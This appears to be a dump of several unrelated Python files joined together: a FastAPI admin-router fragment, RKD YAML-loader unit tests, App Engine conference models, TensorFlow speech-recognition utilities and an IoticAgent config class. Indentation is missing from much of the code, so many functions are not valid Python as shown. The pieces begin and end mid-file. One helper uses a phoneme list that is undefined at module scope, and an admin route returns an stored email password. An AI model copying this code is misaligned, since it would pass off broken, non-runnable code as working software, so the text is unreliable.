return cls._instance
def create_database(self):
"""创建数据库"""
self.admin_database.create_all()
def __init__(self, router: APIRouter, database_url: str):
"""
        On creation, register __router and pass in the database connection info.
        The database uses its own independent connection, opened asynchronously.
        database_url is the database connection string.
"""
        # Register the router
        # router.include_router(self.__router,prefix='/admin',tags=['admin'])
        self.__router = router
        self.admin_database = AdminDatabase(database_url=database_url)
        # Register routes
        self.__router.include_router(auth_router, prefix='/auth', tags=['auth'])
        # Uncomment when the database tables need to be created
        # self.admin_database.create_all()
        self.database = self.admin_database.database
        router.on_event('startup')(self.admin_database.startup)
        router.on_event('shutdown')(self.admin_database.shutdown)
        # Register the login route
self.default_registe()
def register_Model(self, model: Any, view=None,
methods: Union[List[str], Set[str]] = ('GET', 'Retrieve', 'POST', 'PUT', 'DELETE'),
schema=None,
schema_noid=None,
fields: Union[str, List[str]] = "__all__",
list_display: Union[str, List[str]] = "__all__", put_fields: Optional[List[str]] = None,
need_user=False, get_need_user=False, depends=None) -> bool:
"""
        Register a model on the router.
        :param model: the SQLAlchemy model
        :param view: a custom View class
        :param methods: the HTTP methods allowed
        :param fields: fields accepted on POST; defaults to all fields
        :param list_display: fields shown in the list view
        :param put_fields: fields allowed on PUT; defaults to the same as fields
        :return: whether registration succeeded
"""
__schema, __schema_noid = create_schema(model)
if not schema:
schema = __schema
if not schema_noid:
schema_noid = __schema_noid
if not view:
view = create_View(model=model, database=self.database, schema=schema, schema_noid=schema_noid,
need_user=need_user, get_need_user=get_need_user)
else:
view.database = self.database
        # Register on a dedicated sub-router
self.register_view(view, "/" + model.__name__, methods=methods, depends=depends)
return True
def register_view(self, view, prefix=None,
methods: Union[List[str], Set[str]] = ('GET', 'Retrieve', 'POST', 'PUT', 'DELETE'), tags=None,
depends=None):
"""
        If no custom methods are used, pass methods=None
:param view:
:param prefix:
:param methods:
:param tags:
:return:
"""
router = APIRouter()
if not prefix:
prefix = "/" + view.__class__.__name__
if not tags:
tags = [prefix[1:]]
if not methods:
methods = view.methods
if methods.count('GET'):
# print("注意,可能需要设置返回model")
# get_res_model = get_res_schema(view.schema)
router.get(prefix, tags=tags, )(view.list)
if methods.count('Retrieve'):
router.get(prefix + "/{id}", tags=tags, )(view.retrieve)
if methods.count('POST'):
router.post(prefix, tags=tags, )(view.create)
if methods.count('PUT'):
router.put(prefix, tags=tags, )(view.update)
if methods.count('DELETE'):
router.delete(prefix + "/{id}", tags=tags)(view.delete)
self.__router.include_router(router, prefix='/admin')
def register_router(self, func, method, prefix, res_model=None, tags=None, ):
"""
        Register a single route.
        :param func: the handler function
        :param method: the HTTP method
        :param prefix: the route path
        :param res_model: the response model
        :param tags: the route tags
:return:
"""
if method == 'GET':
if res_model:
self.__router.get(prefix, response_model=res_model)(func)
else:
self.__router.get(prefix, )(func)
else:
if res_model:
self.__router.post(prefix, response_model=res_model)(func)
else:
self.__router.post(prefix, )(func)
def default_registe(self):
"""
        Default registrations performed on startup.
        :return:
        """
        # Register the login route
self.__router.post('/user/login', response_model=Token)(login)
schema, schema_noid = create_schema(User)
view = create_View(model=User, database=self.database, schema=schema, schema_noid=schema_noid, need_user=True,
get_need_user=True)
view.create = create_create(User, self.database)
# user_list,user_list model_get_func_fetch_one
# view.delete=
# self.register_view(view, prefix="/user", methods=['GET', "Retrieve", "PUT", "POST",'DELETE'])
self.register_Model(Group, need_user=True, get_need_user=True)
self.register_Model(Permission, need_user=True, get_need_user=True)
self.register_Model(UserLog, methods=['GET'], need_user=True, get_need_user=True)
from .config.views import config_update, BaseConfig, email_config_update, EmailConfig
# self.register_router(create_create,method="POST",prefix="/user/createUser",)
self.register_router(config_update, method="PUT", prefix="/config/baseconfig", )
self.register_router(email_config_update, method="PUT", prefix="/config/emailconfig", )
baseconfig_func, baseconfig_schema = model_get_func_fetch_one(Config, "BaseConfig", need_user=False)
emailconfig_func, email_config_schema = model_get_func_fetch_one(Config, "EmailConfig",
fields=["smtp_host", "smtp_port", "smtp_email",
"smtp_email_password"], need_user=True)
self.register_router(baseconfig_func, method="GET", prefix="/config/baseconfig", res_model=BaseConfig, )
self.register_router(emailconfig_func, method="GET", prefix="/config/emailconfig", res_model=EmailConfig)
def register_Model_v2(self, model, params_dict: dict):
"""升级版获取view"""
        # Note: if model is a list, a combined field set is built from all of the models.
        # If model is a list, fields must be specified explicitly to avoid duplicate field names;
        # if two models share a field, use the "<model name>_<field name>" format for field, exclude and field_param control.
        # There is no need for this yet, so duplicate-field display is left to the caller; the id field defaults to the
        # last model's, which is harmless in practice (almost all model ids follow the same rule).
for method, param in params_dict.items():
if method == 'GET':
# schema_name = param.get('schema_name') or param.get("name") or str(model.__name__) + "_" + str(
# ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', 5)))
# if str(param.get('use_page', None)) == 'None' or param.get('use_page', None):
# schema = create_page_schema(model, schema_name=schema_name, need_fields=param.get('need_fields'),
# fields_params=param.get('fields'), exclude=param.get("exclude"))
#
#
# else:
# schema = create_schema_v2(model, schema_name=schema_name, need_fields=param.get('need_fields'),
# fields_params=param.get('fields'), exclude=param.get("exclude"))
if isinstance(model, list):
func = page_query(model, param.get("sql"))
else:
func = page_query(model)
prefix = param.get("prefix") or "/v2/admin/" + str(model.__name__)
self.__router.get(prefix, description=param.get('description'), name=param.get("name"), )(func)
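# Illustrative wiring of FastAPIAdmin (a sketch; the database URL is an assumption):
#
#     from fastapi import FastAPI, APIRouter
#     app = FastAPI()
#     router = APIRouter()
#     admin = FastAPIAdmin(router, database_url='sqlite:///./admin.db')
#     app.include_router(router)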
|
the-stack_0_19866 | #!/usr/bin/env python3
import os
import tempfile
from rkd.api.testing import BasicTestingCase
from rkd.yaml_parser import YamlFileLoader
from rkd.exception import YAMLFileValidationError
SCRIPT_DIR_PATH = os.path.dirname(os.path.realpath(__file__))
def last_occurrence_replace(s, old, new):
return (s[::-1].replace(old[::-1], new[::-1], 1))[::-1]
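# e.g. last_occurrence_replace('a/test/b/test', 'test', 'X') -> 'a/test/b/X'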
class TestLoader(BasicTestingCase):
def test_validates_successfully(self):
yaml_loader = YamlFileLoader([])
parsed = yaml_loader.load('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks: {}
''', schema_name='org.riotkit.rkd/yaml/v1')
self.assertIn('version', parsed)
def test_raises_error_when_type_does_not_match(self):
"""Expect OBJECT at .tasks path, but get ARRAY instead"""
yaml_loader = YamlFileLoader([])
self.assertRaises(
YAMLFileValidationError,
lambda: yaml_loader.load('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks: []
''', schema_name='org.riotkit.rkd/yaml/v1')
)
def test_expect_path_will_be_shown_in_exception_message(self):
"""Simply check if path to the attribute will be printed within the exception"""
yaml_loader = YamlFileLoader([])
try:
yaml_loader.load('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks:
:join:iwa-ait: []
''', schema_name='org.riotkit.rkd/yaml/v1')
except YAMLFileValidationError as e:
self.assertIn(
"YAML schema validation failed at path \"tasks.:join:iwa-ait\" with error: [] is not of type 'object'",
str(e)
)
return
self.fail('Expected an exception to be raised')
def test_expect_deeper_validation_will_be_performed(self):
"""Expects that argparse arguments will be validated"""
yaml_loader = YamlFileLoader([])
try:
yaml_loader.load('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks:
:join:iwa-ait:
description: Subscribe to any local section of IWA-AIT, workers have common interest
arguments:
- not a list
''', schema_name='org.riotkit.rkd/yaml/v1')
except YAMLFileValidationError as e:
self.assertIn("tasks.:join:iwa-ait.arguments", str(e))
self.assertIn("is not of type 'object'", str(e))
return
self.fail('Expected an exception to be raised')
def test_loads_from_file_is_searching_in_rkd_path(self):
"""Assert that makefile.yml will be searched in RKD_PATH"""
yaml_loader = YamlFileLoader([])
d = tempfile.TemporaryDirectory()
os.environ['RKD_PATH'] = d.name
with open(d.name + '/makefile.yml', 'w') as f:
f.write('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks:
:join:iwa-ait:
description: Subscribe to any local section of IWA-AIT, workers have common interest
arguments:
- not a list
''')
try:
self.assertRaises(YAMLFileValidationError,
lambda: yaml_loader.load_from_file('makefile.yml', 'org.riotkit.rkd/yaml/v1'))
finally:
d.cleanup()
os.environ['RKD_PATH'] = ''
def test_invalid_file_path_is_causing_exception(self):
"""Test that invalid path will be reported quickly"""
yaml_loader = YamlFileLoader([])
self.assertRaises(FileNotFoundError,
lambda: yaml_loader.load_from_file('non-existing-file.yml', 'org.riotkit.rkd/yaml/v1'))
def test_get_lookup_paths_includes_internal_path_as_well_as_rkd_path(self):
"""Verify that lookup paths includes RKD_PATH and internal RKD directories"""
yaml_loader = YamlFileLoader([])
os.environ['RKD_PATH'] = 'SOME-PATH-THERE'
try:
paths = yaml_loader.get_lookup_paths('harbor-internal/')
finally:
os.environ['RKD_PATH'] = ''
defined_by_rkd_path = paths.index('SOME-PATH-THERE/harbor-internal/')
internal_path = last_occurrence_replace(os.path.realpath(SCRIPT_DIR_PATH) + '/harbor-internal/', 'test/', '')
internal_path_index = paths.index(internal_path)
self.assertGreater(defined_by_rkd_path, internal_path_index, msg='defined_by_rkd_path should be favored')
def test_find_path_by_name_founds_path(self):
"""Assert that makefile.yml will be searched in RKD_PATH"""
yaml_loader = YamlFileLoader([])
d = tempfile.TemporaryDirectory()
os.environ['RKD_PATH'] = d.name
with open(d.name + '/makefile.yml', 'w') as f:
f.write('''
version: org.riotkit.rkd/yaml/v1
imports: []
tasks:
:join:iwa-ait:
description: Subscribe to any local section of IWA-AIT, workers have common interest
arguments:
- not a list
''')
try:
path = yaml_loader.find_path_by_name('makefile.yml', '/')
self.assertTrue(len(path) > 0)
finally:
d.cleanup()
os.environ['RKD_PATH'] = ''
def test_find_path_by_name_does_not_found_anything(self):
"""Verify that find_path_by_name() will not return anything if nothing searched was found"""
yaml_loader = YamlFileLoader([])
self.assertEqual('', yaml_loader.find_path_by_name('some-file-that-does-not-exists', ''))
|
the-stack_0_19867 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""models.py
Udacity conference server-side Python App Engine data & ProtoRPC models
$Id: models.py,v 1.1 2014/05/24 22:01:10 wesc Exp $
created/forked from conferences.py by wesc on 2014 may 24
"""
__author__ = '[email protected] (Wesley Chun)'
import httplib
import endpoints
from protorpc import messages
from google.appengine.ext import ndb
class ConflictException(endpoints.ServiceException):
"""ConflictException -- exception mapped to HTTP 409 response"""
http_status = httplib.CONFLICT
class Profile(ndb.Model):
"""Profile -- User profile object"""
displayName = ndb.StringProperty()
mainEmail = ndb.StringProperty()
teeShirtSize = ndb.StringProperty(default='NOT_SPECIFIED')
conferenceKeysToAttend = ndb.StringProperty(repeated=True)
sessionKeysInWishlist = ndb.StringProperty(repeated=True)
class ProfileMiniForm(messages.Message):
"""ProfileMiniForm -- update Profile form message"""
displayName = messages.StringField(1)
teeShirtSize = messages.EnumField('TeeShirtSize', 2)
class ProfileForm(messages.Message):
"""ProfileForm -- Profile outbound form message"""
displayName = messages.StringField(1)
mainEmail = messages.StringField(2)
teeShirtSize = messages.EnumField('TeeShirtSize', 3)
conferenceKeysToAttend = messages.StringField(4, repeated=True)
sessionKeysInWishlist = messages.StringField(5, repeated=True)
class StringMessage(messages.Message):
"""StringMessage-- outbound (single) string message"""
data = messages.StringField(1, required=True)
class BooleanMessage(messages.Message):
"""BooleanMessage-- outbound Boolean value message"""
data = messages.BooleanField(1)
class Conference(ndb.Model):
"""Conference -- Conference object"""
name = ndb.StringProperty(required=True)
description = ndb.StringProperty()
organizerUserId = ndb.StringProperty()
topics = ndb.StringProperty(repeated=True)
city = ndb.StringProperty()
startDate = ndb.DateProperty()
month = ndb.IntegerProperty() # TODO: do we need for indexing like Java?
endDate = ndb.DateProperty()
maxAttendees = ndb.IntegerProperty()
seatsAvailable = ndb.IntegerProperty()
class ConferenceForm(messages.Message):
"""ConferenceForm -- Conference outbound form message"""
name = messages.StringField(1)
description = messages.StringField(2)
organizerUserId = messages.StringField(3)
topics = messages.StringField(4, repeated=True)
city = messages.StringField(5)
startDate = messages.StringField(6) # DateTimeField()
month = messages.IntegerField(7)
maxAttendees = messages.IntegerField(8)
seatsAvailable = messages.IntegerField(9)
endDate = messages.StringField(10) # DateTimeField()
websafeKey = messages.StringField(11)
organizerDisplayName = messages.StringField(12)
class ConferenceForms(messages.Message):
"""ConferenceForms -- multiple Conference outbound form message"""
items = messages.MessageField(ConferenceForm, 1, repeated=True)
class Session(ndb.Model):
name = ndb.StringProperty(required=True)
highlights = ndb.StringProperty()
speaker = ndb.StringProperty(required=True)
duration = ndb.IntegerProperty()
typeOfSession = ndb.StringProperty(repeated=True)
date = ndb.DateProperty()
start_time = ndb.TimeProperty()
wish_list_count = ndb.IntegerProperty()
class SessionForm(messages.Message):
name = messages.StringField(1)
highlights = messages.StringField(2)
speaker = messages.StringField(3)
duration = messages.IntegerField(4)
typeOfSession = messages.StringField(5, repeated=True)
date = messages.StringField(6)
start_time = messages.StringField(7)
websafeConferenceKey = messages.StringField(8)
websafeKey = messages.StringField(9)
class SessionForms(messages.Message):
"""SessionForms -- multiple Session outbound form message"""
items = messages.MessageField(SessionForm, 1, repeated=True)
class FeaturedSpeakerForm(messages.Message):
speaker = messages.StringField(1)
name = messages.StringField(2, repeated=True)
class FeaturedSpeakerForms(messages.Message):
"""FeaturedSpeakerForm -- multiple Session outbound form message"""
items = messages.MessageField(FeaturedSpeakerForm, 1, repeated=True)
class TeeShirtSize(messages.Enum):
"""TeeShirtSize -- t-shirt size enumeration value"""
NOT_SPECIFIED = 1
XS_M = 2
XS_W = 3
S_M = 4
S_W = 5
M_M = 6
M_W = 7
L_M = 8
L_W = 9
XL_M = 10
XL_W = 11
XXL_M = 12
XXL_W = 13
XXXL_M = 14
XXXL_W = 15
class ConferenceQueryForm(messages.Message):
"""ConferenceQueryForm -- Conference query inbound form message"""
field = messages.StringField(1)
operator = messages.StringField(2)
value = messages.StringField(3)
class ConferenceQueryForms(messages.Message):
"""ConferenceQueryForms -- multiple ConferenceQueryForm inbound form message"""
filters = messages.MessageField(ConferenceQueryForm, 1,
repeated=True)
|
the-stack_0_19868 | # encoding: utf-8
# ******************************************************
# Author : zzw922cn
# Last modified: 2017-12-09 11:00
# Email : [email protected]
# Filename : utils.py
# Description : Function utils library for Automatic Speech Recognition
# ******************************************************
import time
from functools import wraps
import os
from glob import glob
import numpy as np
import tensorflow as tf
import math
def describe(func):
    ''' Wrap a function to print its name and report its running time
'''
@wraps(func)
def wrapper(*args, **kwargs):
print(func.__name__+'...')
start = time.time()
result = func(*args, **kwargs)
end = time.time()
print(str(func.__name__+' in '+ str(end-start)+' s'))
return result
return wrapper
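# Example usage of @describe (illustrative function name):
#
#     @describe
#     def train_epoch():
#         time.sleep(0.1)
#
#     train_epoch()  # prints "train_epoch..." and then "train_epoch in 0.1... s"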
def getAttrs(object, name):
''' get attributes for object
'''
assert type(name) == list, 'name must be a list'
value = []
for n in name:
value.append(getattr(object, n, 'None'))
return value
def setAttrs(object, attrsName, attrsValue):
''' register attributes for this class '''
assert type(attrsName) == list, 'attrsName must be a list'
assert type(attrsValue) == list, 'attrsValue must be a list'
for name, value in zip(attrsName, attrsValue):
object.__dict__[name] = value
def output_to_sequence(lmt, type='phn'):
''' convert the output into sequences of characters or phonemes
'''
phn = ['aa', 'ae', 'ah', 'ao', 'aw', 'ax', 'ax-h',
'axr', 'ay', 'b', 'bcl', 'ch', 'd', 'dcl',
'dh', 'dx', 'eh', 'el', 'em', 'en', 'eng',
'epi', 'er', 'ey', 'f', 'g', 'gcl', 'h#',
'hh', 'hv', 'ih', 'ix', 'iy', 'jh', 'k',
'kcl', 'l', 'm', 'n', 'ng', 'nx', 'ow',
'oy', 'p', 'pau', 'pcl', 'q', 'r', 's',
'sh', 't', 'tcl', 'th', 'uh', 'uw', 'ux',
'v', 'w', 'y', 'z', 'zh']
sequences = []
start = 0
sequences.append([])
for i in range(len(lmt[0])):
if lmt[0][i][0] == start:
sequences[start].append(lmt[1][i])
else:
start = start + 1
sequences.append([])
    # here, we only print the first sequence of the batch
    indexes = sequences[0]
if type == 'phn':
seq = []
for ind in indexes:
if ind == len(phn):
pass
else:
seq.append(phn[ind])
seq = ' '.join(seq)
return seq
elif type == 'cha':
seq = []
for ind in indexes:
if ind == 0:
seq.append(' ')
elif ind == 27:
seq.append("'")
elif ind == 28:
pass
else:
seq.append(chr(ind+96))
seq = ''.join(seq)
return seq
else:
raise TypeError('mode should be phoneme or character')
def target2phoneme(target):
    # NOTE: this helper assumes a module-level `phn` list (the same 61-phoneme
    # table defined inside output_to_sequence); it is undefined at module scope here.
    seq = []
for t in target:
if t == len(phn):
pass
else:
seq.append(phn[t])
seq = ' '.join(seq)
return seq
@describe
def logging(model,logfile,errorRate,epoch=0,delta_time=0,mode='train'):
''' log the cost and error rate and time while training or testing
'''
if mode != 'train' and mode != 'test' and mode != 'config' and mode != 'dev':
        raise TypeError('mode should be train, test, dev or config.')
logfile = logfile
if mode == 'config':
with open(logfile, "a") as myfile:
myfile.write(str(model.config)+'\n')
elif mode == 'train':
with open(logfile, "a") as myfile:
myfile.write(str(time.strftime('%X %x %Z'))+'\n')
myfile.write("Epoch:"+str(epoch+1)+' '+"train error rate:"+str(errorRate)+'\n')
myfile.write("Epoch:"+str(epoch+1)+' '+"train time:"+str(delta_time)+' s\n')
elif mode == 'test':
logfile = logfile+'_TEST'
with open(logfile, "a") as myfile:
myfile.write(str(model.config)+'\n')
myfile.write(str(time.strftime('%X %x %Z'))+'\n')
myfile.write("test error rate:"+str(errorRate)+'\n')
elif mode == 'dev':
logfile = logfile+'_DEV'
with open(logfile, "a") as myfile:
myfile.write(str(model.config)+'\n')
myfile.write(str(time.strftime('%X %x %Z'))+'\n')
myfile.write("development error rate:"+str(errorRate)+'\n')
@describe
def count_params(model, mode='trainable'):
''' count all parameters of a tensorflow graph
'''
if mode == 'all':
num = np.sum([np.product([xi.value for xi in x.get_shape()]) for x in model.var_op])
elif mode == 'trainable':
num = np.sum([np.product([xi.value for xi in x.get_shape()]) for x in model.var_trainable_op])
else:
raise TypeError('mode should be all or trainable.')
print('number of '+mode+' parameters: '+str(num))
return num
def list_to_sparse_tensor(targetList, level):
''' turn 2-D List to SparseTensor
'''
indices = [] #index
vals = [] #value
assert level == 'phn' or level == 'cha', 'type must be phoneme or character, seq2seq will be supported in future'
phn = ['aa', 'ae', 'ah', 'ao', 'aw', 'ax', 'ax-h',\
'axr', 'ay', 'b', 'bcl', 'ch', 'd', 'dcl',\
'dh', 'dx', 'eh', 'el', 'em', 'en', 'eng',\
'epi', 'er', 'ey', 'f', 'g', 'gcl', 'h#',\
'hh', 'hv', 'ih', 'ix', 'iy', 'jh', 'k',\
'kcl', 'l', 'm', 'n', 'ng', 'nx', 'ow',\
'oy', 'p', 'pau', 'pcl', 'q', 'r', 's',\
'sh', 't', 'tcl', 'th', 'uh', 'uw', 'ux',\
'v', 'w', 'y', 'z', 'zh']
mapping = {'ah': 'ax', 'ax-h': 'ax', 'ux': 'uw', 'aa': 'ao', 'ih': 'ix', \
'axr': 'er', 'el': 'l', 'em': 'm', 'en': 'n', 'nx': 'n',\
'eng': 'ng', 'sh': 'zh', 'hv': 'hh', 'bcl': 'h#', 'pcl': 'h#',\
'dcl': 'h#', 'tcl': 'h#', 'gcl': 'h#', 'kcl': 'h#',\
'q': 'h#', 'epi': 'h#', 'pau': 'h#'}
group_phn = ['ae', 'ao', 'aw', 'ax', 'ay', 'b', 'ch', 'd', 'dh', 'dx', 'eh', \
'er', 'ey', 'f', 'g', 'h#', 'hh', 'ix', 'iy', 'jh', 'k', 'l', \
'm', 'n', 'ng', 'ow', 'oy', 'p', 'r', 's', 't', 'th', 'uh', 'uw',\
'v', 'w', 'y', 'z', 'zh']
if level == 'cha':
for tI, target in enumerate(targetList):
for seqI, val in enumerate(target):
indices.append([tI, seqI])
vals.append(val)
shape = [len(targetList), np.asarray(indices).max(axis=0)[1]+1] #shape
return (np.array(indices), np.array(vals), np.array(shape))
elif level == 'phn':
'''
for phn level, we should collapse 61 labels into 39 labels before scoring
Reference:
Heterogeneous Acoustic Measurements and Multiple Classifiers for Speech Recognition(1986),
Andrew K. Halberstadt, https://groups.csail.mit.edu/sls/publications/1998/phdthesis-drew.pdf
'''
for tI, target in enumerate(targetList):
for seqI, val in enumerate(target):
if val < len(phn) and (phn[val] in mapping.keys()):
val = group_phn.index(mapping[phn[val]])
indices.append([tI, seqI])
vals.append(val)
shape = [len(targetList), np.asarray(indices).max(0)[1]+1] #shape
return (np.array(indices), np.array(vals), np.array(shape))
else:
##support seq2seq in future here
raise ValueError('Invalid level: %s'%str(level))
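# Illustrative 'cha'-level output (assumed labels): list_to_sparse_tensor([[1, 2], [3]], 'cha')
# returns (indices=[[0, 0], [0, 1], [1, 0]], vals=[1, 2, 3], shape=[2, 2]),
# the (indices, values, dense_shape) triple expected by tf.SparseTensor.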
def get_edit_distance(hyp_arr, truth_arr, normalize, level):
''' calculate edit distance
This is very universal, both for cha-level and phn-level
'''
graph = tf.Graph()
with graph.as_default():
truth = tf.sparse_placeholder(tf.int32)
hyp = tf.sparse_placeholder(tf.int32)
editDist = tf.reduce_sum(tf.edit_distance(hyp, truth, normalize=normalize))
with tf.Session(graph=graph) as session:
truthTest = list_to_sparse_tensor(truth_arr, level)
hypTest = list_to_sparse_tensor(hyp_arr, level)
feedDict = {truth: truthTest, hyp: hypTest}
dist = session.run(editDist, feed_dict=feedDict)
return dist
def data_lists_to_batches(inputList, targetList, batchSize, level):
''' padding the input list to a same dimension, integrate all data into batchInputs
'''
assert len(inputList) == len(targetList)
# dimensions of inputList:batch*39*time_length
nFeatures = inputList[0].shape[0]
maxLength = 0
for inp in inputList:
# find the max time_length
maxLength = max(maxLength, inp.shape[1])
# randIxs is the shuffled index from range(0,len(inputList))
randIxs = np.random.permutation(len(inputList))
start, end = (0, batchSize)
dataBatches = []
while end <= len(inputList):
# batchSeqLengths store the time-length of each sample in a mini-batch
batchSeqLengths = np.zeros(batchSize)
# randIxs is the shuffled index of input list
for batchI, origI in enumerate(randIxs[start:end]):
batchSeqLengths[batchI] = inputList[origI].shape[-1]
batchInputs = np.zeros((maxLength, batchSize, nFeatures))
batchTargetList = []
for batchI, origI in enumerate(randIxs[start:end]):
# padSecs is the length of padding
padSecs = maxLength - inputList[origI].shape[1]
# numpy.pad pad the inputList[origI] with zeos at the tail
batchInputs[:,batchI,:] = np.pad(inputList[origI].T, ((0,padSecs),(0,0)), 'constant', constant_values=0)
# target label
batchTargetList.append(targetList[origI])
dataBatches.append((batchInputs, list_to_sparse_tensor(batchTargetList, level), batchSeqLengths))
start += batchSize
end += batchSize
return (dataBatches, maxLength)
def load_batched_data(mfccPath, labelPath, batchSize, mode, level):
'''returns 3-element tuple: batched data (list), maxTimeLength (int), and
total number of samples (int)'''
return data_lists_to_batches([np.load(os.path.join(mfccPath, fn)) for fn in os.listdir(mfccPath)],
[np.load(os.path.join(labelPath, fn)) for fn in os.listdir(labelPath)],
batchSize, level) + (len(os.listdir(mfccPath)),)
def list_dirs(mfcc_dir, label_dir):
mfcc_dirs = glob(mfcc_dir)
label_dirs = glob(label_dir)
for mfcc,label in zip(mfcc_dirs,label_dirs):
yield (mfcc,label)
def batch_norm(x, is_training=True):
""" Batch normalization.
"""
with tf.variable_scope('BatchNorm'):
inputs_shape = x.get_shape()
axis = list(range(len(inputs_shape) - 1))
param_shape = inputs_shape[-1:]
beta = tf.get_variable('beta', param_shape, initializer=tf.constant_initializer(0.))
gamma = tf.get_variable('gamma', param_shape, initializer=tf.constant_initializer(1.))
batch_mean, batch_var = tf.nn.moments(x, axis)
ema = tf.train.ExponentialMovingAverage(decay=0.5)
def mean_var_with_update():
ema_apply_op = ema.apply([batch_mean, batch_var])
with tf.control_dependencies([ema_apply_op]):
return tf.identity(batch_mean), tf.identity(batch_var)
mean, var = tf.cond(is_training,
mean_var_with_update,
lambda: (ema.average(batch_mean), ema.average(batch_var)))
normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3)
return normed
def _get_dims(shape):
"""get shape for initialization
"""
fan_in = shape[0] if len(shape) == 2 else np.prod(shape[:-1])
fan_out = shape[1] if len(shape) == 2 else shape[-1]
return fan_in, fan_out
def dropout(x, keep_prob, is_training):
""" Apply dropout to a tensor
"""
return tf.contrib.layers.dropout(x, keep_prob=keep_prob, is_training=is_training)
|
the-stack_0_19869 | # Copyright (c) 2016 Iotic Labs Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/Iotic-Labs/py-IoticAgent/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrapper object for the Client Configuration file
"""
from __future__ import unicode_literals
from sys import argv
from io import StringIO
import os.path
import logging
logger = logging.getLogger(__name__)
from IoticAgent.Core.compat import PY3
if PY3:
from configparser import ConfigParser # pylint: disable=import-error,wrong-import-order
else:
from ConfigParser import ConfigParser # pylint: disable=import-error,wrong-import-order
class Config(object):
def __init__(self, fn=None, string=None):
"""Config helper reads/writes .ini files.
If a setting is not specified in the .ini file the default from `self.__defaults` will be used. Alternatively
a textual configuration can be specified using the `string` argument. `fn` takes precedence over `string`.
`[agent] =` This section is used for AMQP Login details.
#!python
host = # ip:port of the AMQP broker
vhost = # virtualhost name
prefix = # username (agent id) prefix for login
sslca = # SSL CA file for non-public (dns) broker connections
lang = # The two-character ISO 639-1 language code to use by
# default for your agent. Uses container default
# if not specified
`[iot] =` Settings for the IOT wrapper
sync_request_timeout = # 330 (default). How long synchronous requests at most wait before timing out. This
# option should have a higher value set than core.network_retry_timeout.
`[logging] =` Logging preferences
amqp and rdflib are both set to Warning to prevent verbose/boring output
`[core] =` advanced settings
#!python
network_retry_timeout = # seconds to retry message sending for if no
# connection. 0 to disable.
# IOT functions that make requests without
# internet access will block until success
# or retry_timeout
socket_timeout = # 10 (default) Underlying socket connection/operation timeout
auto_encode_decode = # 1 (default). If a dict is shared it can be
# automatically encoded and decoded.
# Disable with = 0.
queue_size = # 128 (default). Maximum number of (outgoing) requests to allow in pending
# request queue before blocking. Set to zero for unlimited. Whether queue
# fills up depends on latency & throughput of network & container as well as
# throttling setting.
throttle = # Automatic request (outgoing) throttling, specified as comma-separate list of
# REQUESTS/INTERVAL pairs. E.g. '180/60,600/300' would result in no more than 180
# requests being sent over the last 60 seconds and no more than 600 requests over the
# last 5 minutes. Used to prevent rate-limiting containers from temporarily banning
# the client without requiring application code to introduce artificial delays. Note:
# The limits should be set a bit lower than the hard limits imposed by container.
"""
self.__fname = None
self.__config = {}
#
# Defaults if not specified in config file
self.__defaults = {
'agent': {
'vhost': 'container1',
'prefix': ''
},
'iot': {
'sync_request_timeout': 330
},
'core': {
'network_retry_timeout': 300,
'socket_timeout': 10,
'auto_encode_decode': 1,
'queue_size': 128,
'throttle': '480/30,1680/300',
'conn_retry_delay': 5,
'conn_error_log_threshold': 180
},
'logging': {
'amqp': 'warning',
'rdflib': 'warning'
}
}
#
self.__config = {
'iot': {},
'core': {},
'agent': {},
'logging': {}
}
# Sanity, check the config file exists and is valid
self.__fname = fn
if string is not None and fn is None:
conf_stream = StringIO(string)
conf_name = 'string'
else:
self.__fname = self._file_loc()
conf_name = self.__fname
if os.path.exists(self.__fname):
conf_stream = open(self.__fname, 'r')
else:
conf_stream = StringIO()
#
cpa = ConfigParser()
try:
if PY3:
cpa.read_file(conf_stream, source=conf_name) # pylint: disable=no-member
else:
cpa.readfp(conf_stream, conf_name) # pylint: disable=deprecated-method
finally:
conf_stream.close()
for ese in cpa.sections():
for eva in cpa.options(ese):
self.update(ese, eva, cpa.get(ese, eva))
def _file_loc(self):
"""_file_loc helper returns a possible config filename.
EG /tmp/stuff/fish.py -> /tmp/stuff/fish.ini
"""
if self.__fname is None:
f = os.path.splitext(os.path.basename(argv[0]))[0] + '.ini'
cwd = os.getcwd()
# todo: prefer script path or current path ??
# print(os.path.realpath(sys.argv[0]))
# todo: if os.path.exists(os.path.join(cwd, main.__file__)):
return os.path.join(cwd, f)
return self.__fname
def setup_logging(self):
"""Setup logging module based on known modules in the config file
"""
logging.getLogger('amqp').setLevel(str_to_logging(self.get('logging', 'amqp')))
logging.getLogger('rdflib').setLevel(str_to_logging(self.get('logging', 'rdflib')))
def save(self, filename=None):
"""Write config to file."""
if self.__fname is None and filename is None:
raise ValueError('Config loaded from string, no filename specified')
conf = self.__config
cpa = dict_to_cp(conf)
with open(self.__fname if filename is None else filename, 'w') as f:
cpa.write(f)
def get(self, section, val):
"""Get a setting or the default
`Returns` The current value of the setting `val` or the default, or `None` if not found
`section` (string) the section name in the config E.g. `"agent"`
`val` (string) the section name in the config E.g. `"host"`
"""
val = val.lower()
if section in self.__config:
if val in self.__config[section]:
# logger.debug('get config %s %s = %s', section, val, self.__config[section][val])
return self.__config[section][val]
if section in self.__defaults:
if val in self.__defaults[section]:
# logger.debug('get defaults %s %s = %s', section, val, self.__defaults[section][val])
return self.__defaults[section][val]
return None
def set(self, section, val, data):
"""Add a setting to the config
`section` (string) the section name in the config E.g. `"agent"`
`val` (string) the section name in the config E.g. `"host"`
`data` the new value for the `val`
"""
val = val.lower()
if section in self.__config:
# logger.debug('set %s %s = %s', section, val, data)
self.__config[section][val] = data
def update(self, section, val, data):
"""Add a setting to the config, but if same as default or None then no action.
This saves the .save writing the defaults
`section` (string) the section name in the config E.g. `"agent"`
`val` (string) the section name in the config E.g. `"host"`
`data` the new value for the `val`
"""
k = self.get(section, val)
